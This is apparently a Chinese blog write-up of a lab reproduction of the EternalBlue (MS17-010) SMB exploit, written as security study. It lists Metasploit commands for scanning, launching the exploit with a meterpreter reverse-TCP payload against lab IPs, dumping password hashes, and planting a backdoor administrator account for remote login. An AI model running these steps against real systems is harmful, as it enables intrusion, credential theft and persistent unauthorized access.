标签:查看 环境 共享端口 系统管 共享 span 成功 ESS lock
EternalBlue漏洞复现
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。学习漏洞原理掌握攻击方法。
。
查看MSF框架版本
在终端输入msfconsole,进入界面如图1所示。
图1
在进行实验时查看数据库连接和配置如图2所示。
图2
搜索ms17_010图3所示。
图3
扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue
如图4所示
图4
加载攻击模块并配置参数
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.122.130 (靶机的IP)
set lhost 192.168.122.145(发起攻击的主机IP)
set lport 443
图5
发起攻击,成功会反弹shell
输入run或者exploit,结果如图6所示。
图6
获取系统管理密码信息如图7所示。
图7
反弹shell, 种植后门创建一个用户,并查看如图8所示。
图8
加入管理员用户并查看,如图9所示。
图9
创建txt文件,并在kali里截取。如图10所示。
图10
远程登录如图13所示。
图13
本次实验主要是利用永恒之蓝漏洞攻击一台主机,掌握永恒之蓝漏洞原理。
标签:查看 环境 共享端口 系统管 共享 span 成功 ESS lock
原文地址:https://www.cnblogs.com/ls-pankong/p/12147983.html